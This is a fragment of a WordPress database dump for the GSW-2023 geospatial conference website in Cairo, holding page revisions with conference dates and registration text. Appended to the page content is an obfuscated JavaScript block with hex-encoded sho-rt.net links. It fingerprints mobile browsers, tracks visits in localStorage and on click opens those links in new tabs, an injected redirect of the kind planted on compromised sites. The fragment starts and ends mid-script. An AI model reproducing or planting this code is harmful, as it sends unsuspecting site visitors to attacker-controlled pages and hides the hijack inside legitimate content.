_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:27:16','2022-11-09 18:27:16','',3066,'https://gsw2023.com/?p=3188',0,'revision','',0),
(3189,1,'2022-11-09 18:29:57','2022-11-09 18:29:57','','cairo-egypt_shutterstock_1421974805','','inherit','open','closed','','cairo-egypt_shutterstock_1421974805','','','2022-11-09 18:29:57','2022-11-09 18:29:57','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805.jpg',0,'attachment','image/jpeg',0),
(3190,1,'2022-11-09 18:30:23','2022-11-09 18:30:23','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 